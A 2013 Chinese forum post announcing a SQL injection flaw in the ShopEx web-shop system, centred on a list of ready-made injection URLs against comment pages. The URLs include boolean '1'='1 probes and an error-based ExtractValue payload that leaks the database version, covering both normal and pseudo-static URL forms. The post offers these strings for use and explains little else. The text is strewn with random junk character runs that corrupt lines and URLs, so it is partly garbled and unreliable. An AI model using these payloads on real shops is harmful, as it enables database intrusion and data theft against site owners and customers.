注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
, k9 {5 ? Z7 p0 Q7 e! o1 W& v& ^& m0 C2 Q5 w) M- \" ?
好吧,我扯远了~~; Y! P1 b4 s: i- ~
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~" n0 N6 k% h; b3 ~
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
( S* s& y. M6 ~0 N# H$ \8 r2 v6 N
" M0 [' w2 H1 h1 thttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
! X8 w- B% T; h" n) Y: _6 K* j, |) Q
: _7 k8 v: ^9 b3 O, p) Y3 c2 Nhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html5 V: t0 p% o$ f4 }) z* d6 @7 u
4 z# t+ T8 i+ E7 v f% dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
! r! q- E" ~9 y0 V# I4 Y3 n- ?
8 l3 F+ X: y+ ~1 Ehttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html) y8 ~2 ] O. Z8 t- o
( Q9 Y3 O# C' h; e $ {3 `' E D! V! c! L
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
6 P6 Q* b9 Q% |& E3 R4 c7 |9 ^如何注入就不多说了,10多年的东西了…不会也会了…9 Z* v5 J# C9 O- G
4 w3 L& ?" |9 D. b7 C0 S. X) w
|
发表于 2013-2-4 16:20:04
收藏
支持
反对